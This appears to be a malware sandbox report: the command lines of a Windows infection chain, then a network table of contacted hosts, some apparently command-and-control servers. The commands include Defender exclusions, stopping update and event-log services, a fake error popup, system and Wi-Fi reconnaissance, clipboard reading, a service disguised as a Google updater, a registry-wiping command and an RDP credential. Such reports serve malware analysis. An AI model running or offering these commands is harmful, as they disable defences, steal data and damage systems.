C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe
"C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe
"C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe"
C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5420 -ip 5420
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
"C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\cmd.exe
cmd.exe
C:\Users\Admin\AppData\Local\Temp\Files\roblox1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\roblox1.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_60_133785297896286583\stub.exe
C:\Users\Admin\AppData\Local\Temp\Files\roblox1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
"C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\Files\1111.exe
"C:\Users\Admin\AppData\Local\Temp\Files\1111.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\cmd.exe
cmd.exe
C:\Users\Admin\AppData\Local\Temp\Files\dccrypt.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dccrypt.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\serverperf\Rf9n8rAaQutOZQd6TFDgcQ0Y3BLG9XLXz1nDso2.vbe"
C:\Users\Admin\AppData\Local\Temp\Files\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Z9Pp9pM.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\65FE.tmp\65FF.tmp\6600.bat C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmdkey.exe
cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"
C:\Windows\system32\mstsc.exe
mstsc /v: 211.168.94.177
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
"C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\query.exe
query user
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\cmd.exe
cmd.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Users\Admin\AppData\Local\Temp\Files\FACT0987789000900.exe
"C:\Users\Admin\AppData\Local\Temp\Files\FACT0987789000900.exe"
C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe
"C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe"
C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe
"C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe"
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
"C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\serverperf\gc411KmXHpEBvwsmBcLMcGXH8jhoDdLsi9TAz2QKUXLoYkYDWV2rtqOl.bat" "
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\ProgramData\jmqid\ljid.exe
"C:\ProgramData\jmqid\ljid.exe"
C:\Users\Admin\AppData\Local\Temp\Files\hell9o.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hell9o.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\regdel.CMD
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\c13606fe9009f11d\setup.msi"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\serverperf\Portwebwin.exe
"C:\serverperf/Portwebwin.exe"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 23B4D94E03F600F18549286E0C8F6771 C
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Windows\system32\reg.exe
reg DELETE HKEY_CLASSES_ROOT /f
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\Files\rj2wofc38q.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rj2wofc38q.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI866D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241654031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\Files\rj2wofc38q.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rj2wofc38q.exe"
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
C:\Users\Admin\AppData\Local\Temp\Files\svchosts.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchosts.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\ProgramData\jmqid\ljid.exe
"C:\ProgramData\jmqid\ljid.exe"
C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5628 -ip 5628
C:\Users\Admin\AppData\Local\Temp\Files\RMS1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RMS1.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | auntberry.xyz | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | down10d.zol.com.cn | udp |
| CN | 122.143.2.98:80 | down10d.zol.com.cn | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 94.76.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.20.217.172.in-addr.arpa | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 206.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 8.8.8.8:53 | httpbin.org | udp |
| US | 44.196.3.45:443 | httpbin.org | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 8.8.8.8:53 | 45.3.196.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udfbdmhxuvwukipntsca.supabase.co | udp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 172.64.149.246:443 | udfbdmhxuvwukipntsca.supabase.co | tcp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.149.64.172.in-addr.arpa | udp |
| US | 47.254.74.170:13560 | 47.254.74.170 | tcp |
| US | 8.8.8.8:53 | 170.74.254.47.in-addr.arpa | udp |
| KR | 203.232.37.151:80 | 203.232.37.151 | tcp |
| US | 8.8.8.8:53 | 151.37.232.203.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| AM | 217.144.189.241:4333 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 206.217.142.166:1234 | tcp | |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| GB | 64.210.156.18:443 | media.trafficjunky.net | tcp |
| GB | 64.210.156.16:443 | media.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 8.8.8.8:53 | 17.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.201.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | ht-cdn2.adtng.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| GB | 64.210.156.19:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.19:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.19:443 | ht-cdn2.adtng.com | tcp |
| US | 8.8.8.8:53 | hw-cdn2.adtng.com | udp |
| US | 104.219.239.11:6969 | tcp | |
| GB | 64.210.156.0:443 | hw-cdn2.adtng.com | tcp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.156.210.64.in-addr.arpa | udp |
| FR | 142.250.179.91:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 8.8.8.8:53 | 91.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
